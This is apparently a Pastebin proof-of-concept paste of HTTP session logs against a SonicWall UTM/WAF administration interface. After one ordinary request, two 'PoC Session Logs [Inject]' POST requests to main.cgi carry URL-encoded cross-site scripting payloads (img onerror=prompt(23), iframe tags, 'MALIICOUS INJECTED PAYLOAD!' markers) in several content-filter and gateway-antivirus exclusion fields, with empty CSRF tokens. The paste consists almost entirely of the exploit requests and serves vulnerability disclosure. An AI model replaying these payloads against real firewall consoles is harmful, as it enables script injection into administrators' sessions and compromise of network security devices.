Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- — Session Logs (Standard Request) —
- Status: pending[]
- POST https://utm_waf.sonicwall.localhost:8351/main.cgi
- Mime Type[unknown]
- Request Header:
- Host[utm_waf.sonicwall.localhost:8351]
- User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
- Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
- Accept-Language[de,en-US;q=0.7,en;q=0.3]
- Accept-Encoding[gzip, deflate]
- Referer[https://utm_waf.sonicwall.localhost:8351/addCfsLocalRating_-1.html]
- Cookie[curUrl=securityServicesCFView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0;
- 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0]
- POST-Daten:
- csrfToken[]
- cfsRatingObjectName[test23]
- cfsRatingCategory[2]
- selectedItem[test.com]
- itemList[test.com]
- cfsRatingDomainList[test.com]
- refresh_page[securityServicesCFView.html]
- tableIndex[-1]
- cgiaction[%5Bobject+Window%5D]
- — PoC Session Logs (POST) [Inject] #1 —
- Status: pending[]
- POST https://utm_waf.sonicwall.localhost:8351/main.cgi
- Mime Type[unknown]
- Request Header:
- Host[utm_waf.sonicwall.localhost:8351]
- User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
- Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
- Accept-Language[de,en-US;q=0.7,en;q=0.3]
- Accept-Encoding[gzip, deflate]
- Referer[https://utm_waf.sonicwall.localhost:8351/addCfsLocalRating_-1.html]
- Cookie[curUrl=systemStatusView.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0;
- 1040=4; 1041=1; 1042=0; 1043=0; 1044=0; 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0]
- POST-Daten:
- csrfToken[]
- cfsRatingObjectName[+%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3EMALIICOUS INJECTED PAYLOAD!]
- cfsRatingCategory[9]
- selectedItem[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
- itemList[testdomain.com++%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%2823%29%3B%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
- cfsRatingDomainList[testdomain.com++%22%26gt%3B%26lt%3Bimg+src%3Dx+onerror%3Dprompt%2823%29%3B%26gt%3B+++%22%26gt%3B%26lt%3B%22%26lt%3Bimg+src%3D%22x%22%26gt%3B%2520%2520%26gt%3B%22%26lt%3Biframe+src%3Da%26gt%3B%2520%26lt%3Biframe%26gt%3B]
- refresh_page[securityServicesCFView.html]
- tableIndex[-1]
- cgiaction[%5Bobject+Window%5D]
- — PoC Session Logs (POST) [Inject] #2 —
- Status: pending[]
- POST https://utm_waf.sonicwall.localhost:8351/main.cgi
- Mime Type[unknown]
- Request Header:
- Host[utm_waf.sonicwall.localhost:8351]
- User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
- Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
- Accept-Language[de,en-US;q=0.7,en;q=0.3]
- Accept-Encoding[gzip, deflate]
- Referer[https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html]
- Cookie[curUrl=gavSummary.html; curUsr=; 77177=local; 1008=2; 1021=600; 1023=10; 1024=5; 1031=0; 1032=0; 1033=0; 1034=0; 1035=0; 1040=4; 1041=1; 1042=0; 1043=0; 1044=0;
- 1045=0; 1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0; 2039=local; 2040=%7B%22refreshTime%22%3A3%2C%22
- showTimeRange%22%3A10%2C%22refreshEnable%22%3Atrue%2C
- %22viewApplications%22%3A1%2C%22viewBandwidth%22%3A1%2C%22viewPktRate%22%3A1%2C%22viewPktSize%22%3A1%2C%22
- viewConnRate%22%3A1%2C%22viewConnCount%22%3A1%2C%22viewCoreMonitor%22%3A1%2C%22displayBandwidth%22%3A%22bwSelRate%22%2C
- %22displayPktRate%22%3A%22pktRateSelRate%22%2C%22displayPktSize%22%3A%22pktSizeSelRate%22%2C%22displayConnRate%22%3A%22
- connRateSelRate%22%2C%22displayConnCount%22%3A%22connCountSelCount%22%2C%22ipVerBandwidth%22%3A%222%22%2C
- %22ipVerApps%22%3A%222%22%2C%22showMostFrequentApps%22%3Afalse%2C%22inChartAppLegends%22%3Afalse%2C%22hideAppLegends%22%3Atrue%2C%22inChartBwLegends
- %22%3Afalse%2C%22hideBwLegends%22%3Atrue%2C%22hidePktRateLegends%22%3Atrue%2C
- %22hidePktSizeLegends%22%3Atrue%2C%22hideConnRateLegends%22%3Atrue%2C%22hideConnCountLegends%22%3Atrue%2C%22hideAppChart%22%3Afalse%2C%22hideBwChart
- %22%3Afalse%2C%22hidePktRateChart%22%3Afalse%2C%22hidePktSizeChart%22%3Afalse%2C
- %22hideConnRateChart%22%3Afalse%2C%22hideConnCountChart%22%3Afalse%2C%22hideCoreMonChart%22%3Afalse%2C%22hideMemoryMonChart%22%3Afalse%2C%22rtAppColors
- %22%3A%5B%22%23081D58%22%2C%22%23253494%22%2C%22%23225EA8%22%2C%22%231D91C0%22%2C
- %22%2341B6C4%22%2C%22%237FCDBB%22%2C%22%23C7E9B4%22%2C%22%23EDF8B1%22%2C%22%23FFFFD9%22%5D%2C%22rtDataColors
- %22%3A%5B%22%23E41A1C%22%2C%22%23377EB8%22%2C%22%234DAF4A%22%2C%22%23984EA3%22%2C%22%23FF7F00%22%2C%22%23FFFF33%22%2C
- %22%23A65628%22%2C%22%23F781BF%22%2C%22%23999999%22%2C%22%235A6B34%22%2C%22%23F0D64E%22%2C%22%23D7B740%22%2C%22%23AB80
- 24%22%2C%22%23925818%22%2C%22%23DB5A6E%22%2C%22%23071D69%22%2C%22%230A1650%22%2C%22%234571DA%22%2C%22%23E18B5C%22%2C
- %22%23028482%22%2C%22%237ABA7A%22%2C%22%23B76EB8%22%5D%2C%22useGradient%22%3Atrue%7D]
- POST-Daten:
- csrfToken[???]
- inputbox[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
- list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
- gav_cloud_exclude_list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
- gav_cloud_refresh_exclusions[]
- refresh_page[gav_cloud.html]
- isobject[1]
- cgiaction[%5Bobject+Window%5D]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement